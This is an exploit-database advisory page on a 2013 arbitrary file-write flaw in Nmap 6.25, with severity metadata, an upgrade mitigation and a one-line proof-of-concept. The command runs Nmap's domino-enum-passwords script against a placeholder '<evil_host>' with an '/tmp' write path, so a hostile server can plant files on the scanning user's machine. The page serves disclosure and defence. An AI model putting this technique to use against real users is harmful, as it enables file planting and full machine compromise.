header-logo
Suggest Exploit
vendor:
Nmap
by:
SecurityFocus
7,5
CVSS
HIGH
Arbitrary File-Write
264
CWE
Product Name: Nmap
Affected Version From: 6.25
Affected Version To: 6.25
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Nmap Arbitrary File-Write Vulnerability

Nmap is prone to an arbitrary file-write vulnerability. An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.

Mitigation:

Users should upgrade to the latest version of Nmap.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/62024/info

Nmap is prone to an arbitrary file-write vulnerability.

An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.

Nmap 6.25 is vulnerable; other versions may also be affected. 

nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'

Navigation

Suggest Exploit

Services By CQR